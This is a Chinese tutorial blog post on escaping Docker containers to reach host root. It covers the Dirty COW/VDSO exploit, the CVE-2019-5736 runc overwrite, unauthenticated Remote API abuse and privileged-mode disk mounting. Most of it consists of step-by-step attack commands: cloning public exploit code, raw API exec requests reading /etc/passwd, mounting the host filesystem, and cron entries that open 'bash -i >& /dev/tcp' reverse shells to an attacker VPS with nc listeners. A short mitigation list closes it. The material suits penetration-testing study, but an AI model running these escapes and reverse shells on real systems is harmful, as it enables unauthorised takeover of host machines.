本文详细介绍了两种Docker逃逸技术：一是利用DirtyCow漏洞，通过VDSO映射在内存中注入shellcode；二是利用CVE-2019-5736漏洞，篡改runc二进制文件。每种方法都包括了前置知识、利用过程和具体操作步骤，并提到了利用条件和防止逃逸的措施。此外，还讨论了未授权访问Docker Remote API和特权模式容器可能导致的安全风险。 摘要生成于 ，由 DeepSeek-R1 满血版支持，

CATALOG

• 前言
• 利用dirty cow来进行docker逃逸
• • 1.前置知识
  • 2.利用dirty cow与VDSO来实现docker逃逸的过程
  • 3.利用过程
  • • 1.判断是否为docker环境
    • 2.下载脚本
    • 3.利用脚本
    • 4.利用结果
  • 通过cve-2019-5736来达到docker逃逸
  • • 1.利用原理与条件
    • 2.漏洞触发过程
    • 3.具体操作
    • • 第一步：确定docker环境
      • 第二步：下载利用脚本并修改
      • 第三步：编译脚本
      • 第四步：将编译好的main文件上传到docker中
      • 第五步：执行脚本并等待此docker再次被exec
    • 4.对此种方式利用的理解
  • 配置不当导致docker逃逸
  • • 1.docket remote api未授权访问导致逃逸
    • • 确定docker remote api是否可访问
      • 漏洞利用
    • 利用特权模式逃逸
    • • 漏洞原理
      • 漏洞利用
    • 防止docker逃逸的方法
    • 参考文章

    获取某个系统shell后发现其是docker，这时候我们就需要进行docker逃逸来拿到其真正宿主的权限。这里提供几种思路。

    1. 利用dirty cow来进行docker逃逸
    2. cve-2019-5736
    3. docker配置不当

    利用dirty cow来进行docker逃逸

    1.前置知识

    1. VDSO其实就是将内核中的.so文件映射到内存，.so是基于Linux下的动态链接,其功能和作用类似与windows下.dll文件。
    2. 在Linux中，有一个功能：VDSO(virtual dvnamic shared object),这是一个小型共享库，能将内核自动映射到所有用户程序的地址空间,可以理解成将内核中的函数映射到内存中，方便大家访问。

    2.利用dirty cow与VDSO来实现docker逃逸的过程

    dirty cow漏洞可以让我们获取只读内存的写的权限，我们首先利用dirty cow漏洞写入一段shellcode到VDSO映射的一段闲置内存中，然后改变函数的执行顺序，使得调用正常的任意函数之前都要执行这段shellcode。这段shellcode初始化的时候会检查是否是被root调用，如果是则继续执行，如果不是，则接着执行clock_gettime函数，接下来它会检测/tmp/.X文件的存在，如果存在，则这时已经是root权限了，然后它会打开一个反向的TCP链接，为Shellcode中填写的ip返回一个Shell。

    这种利用方法利用成功的前提是，宿主机的内核有dirty cow漏洞。

    3.利用过程

    1.判断是否为docker环境

    • ls -alh /.dockerenv
      docker环境中根目录下存在此文件
      
    • 查看系统进程的 cgroup信息
cat /proc/1/cgroup
      

    2.下载脚本

    git clone https://github.com/scumjr/dirtycow-vdso.git
    cd /dirtycow-vdso/
    3.利用脚本
     
    ./0xdeadbeef #反弹shell到本地主机
    ./0xdeadbeef ip:port #反弹shell到指定主机的指定端口
    4.利用结果
     
    我们直接反弹宿主机的shell到127.0.0.1如图所示
     
     这时候我们进入root文件夹内创建一个任意文件，这里文件名我们定义为random_file。
     
     这时候我们进入宿主机看看(由于是实验环境，所以我们可以通过正常的渠道直接进入宿主机看漏洞利用情况)：
     
     发现宿主机上有我们刚创建的文件，至此docker逃逸成功。
     
    可以通过i春秋的练习环境来进行此实验:
     利用Dirty Cow实现Docker逃逸
     
    通过cve-2019-5736来达到docker逃逸
     
    1.利用原理与条件
     
    通过在docker容器内重写和运行主机系统的runc二进制文件达到逃逸的目的。
     利用条件为：
     
    runc版本<=1.0-rc6
    Docker Version < 18.09.2
     
    2.漏洞触发过程
     
    首先我们得有一个docker下的shell，第二步修改利用脚本中的反弹shell命令，第三步使用go build来编译脚本，第四步将脚本上传到docker中，第五步等待宿主机执行exec进入当前docker容器等时候，宿主机就会向我们的vps反弹root权限的shell。
     
    3.具体操作
     
    第一步：确定docker环境
     
    ls -alh /.dockerenv
     docker环境中根目录下存在此文件
    查看系统进程的cgroup信息
     cat /proc/1/cgroup
     
    第二步：下载利用脚本并修改
     
    git clone https://github.com/Frichetten/CVE-2019-5736-PoC.git
    下图中的选中部分修改\n后面的命令为反弹shell命令即可。
     
     
    第三步：编译脚本
     
    go build main.go
     
    第四步：将编译好的main文件上传到docker中
     
    可以先上传到github然后在docker到shell中使用git clone命令即可，这里不做演示。
     
    第五步：执行脚本并等待此docker再次被exec
     
    docker exec -it test /bin/bash
     如上命令的含义是进入test这个容器，当宿主机上执行exec命令来进入我们运行了脚本的容器的时候，宿主机就会反弹root权限的shell给我们的vps的监听端口，至此利用结束。
     
    4.对此种方式利用的理解
     
    这种方式利用的条件其实比较苛刻，主要苛刻在宿主机必须有人执行exec命令进入当前docker环境，如果没有人在宿主机执行的话，是无法进行docker逃逸的。
     
    配置不当导致docker逃逸
     
    1.docket remote api未授权访问导致逃逸
     
    docker swarm是管理docker集群的工具。主从管理、默认通过2375端口通信。绑定了一个Docker Remote API的服务，可以通过HTTP、Python、调用API来操作Docker。由于环境复杂，这里借用freebuf上的图片。
     
    确定docker remote api是否可访问
     
    直接在浏览器中输入http://ip:2375/version
     
     
    访问http://ip:2375/containers/json看是否出现以下画面：
     
    创建一个包，得到返回的exec_id的参数，数据包内容如下：
     
     
    POST /containers/<container_id>/exec HTTP/1.1
     Host: <docker_host>:PORT
     Content-Type: application/json
     Content-Length: 188
     
     
    {
     “AttachStdin”: true,
     “AttachStdout”: true,
     “AttachStderr”: true,
     “Cmd”: [“cat”, “/etc/passwd”],
     “DetachKeys”: “ctrl-p,ctrl-q”,
     “Privileged”: true,
     “Tty”: true
     }
     
    
     注意其中的cmd字段，这个就是要执行的命令。
     
    得到exec_id参数后构造第二个exec_start数据包，内容如下：
     
     
    POST /exec/<exec_id>/start HTTP/1.1
     Host: <docker_host>:PORT
     Content-Type: application/json
     
     
    {
     “Detach”: false,
     “Tty”: false
     }
     然后发送后会得到结果：
     
     至此成功获取到docker主机的命令执行权限，但是还无法逃逸到宿主机。
     
    在docker容器内安装docker作为client
     apt-get install docker.io
     yum -y install docker
    查看宿主机的docker image信息
     docker -H tcp://宿主机ip:2375 images
    启动一个容器并且将宿主机的根目录抓再到容器的某个目录
     
    docker -H tcp://宿主ip:2375 run -it -v /:/test adafef2e596e /bin/bash 
    上述命令的意思是将宿主机的根目录挂在到容器adafef2e596e的/test目录下
     
    写一个计划任务反弹shell(或者写.ssh公钥都OK)
     
    echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/8888 0>&1' >> /test/var/spool/cron/root
    在vps上使用nc命令等待反弹过来的shell
     nc -lvp 8888
     
    利用特权模式逃逸
     
    使用特权模式启动容器，可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时，Docker容器将被允许访问主机上的所有设备，并可以执行mount命令进行挂载。
     
    查看磁盘文件
     fdisk -l
     
    将/dev/vda1也就是磁盘挂在到本地的任意文件下
     
    mkdir /nuoyan
    mount /dev/vda1 /nuoyan
    
     此时这个nuoyan文件夹就相当于对方主机的根目录，可以进行写文件操作。
     
    写入计划任务
     
    echo '* * * * * bash -i >& /dev/tcp/vps的ip/8888 0>&1' >> /nuoyan/var/spool/cron/root
    在vps上等待shell反连接
     nc -lvp 8888
     
    防止docker逃逸的方法
     
    1、更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736
     2、runc版本 > 1.0-rc6
     3、k8s 集群版本>1.12
     4、Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)
     5、Linux内核版本>=4.14——CVE-2017–1000405(大脏牛)，未找到docker逃逸利用过程，但存在逃逸风险
     6、不建议以root权限运行Docker服务
     7、不建议以privileged（特权模式）启动Docker
     8、不建议将宿主机目录挂载至容器目录
     9、不建议将容器以—cap-add=SYSADMIN启动，SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作，存在容器逃逸风险
     
    初识Docker逃逸
     
    docker容器逃逸案例汇集
    作者：禅与计算机程序设计艺术 / Zen and the Art of Computer Programming
    Docker, 容器化, Linux容器, 微服务, DevOps
    1. 背景介绍
    				
    摘要： ## 0. 前言 本文参考自《Docker 容器与容器云》 这个容器逃逸的 case 存在于 Docker 1.0 之前的绝大多数版本。 目前使用 Docker 1.0 之前版本的环境几乎不存在了，这篇分析的主要目的是为了加深系统安全方面的学习。 本案例所分析的 PoC 源码地址：[shocker.c](https://github.com/gabrtv/shocker/b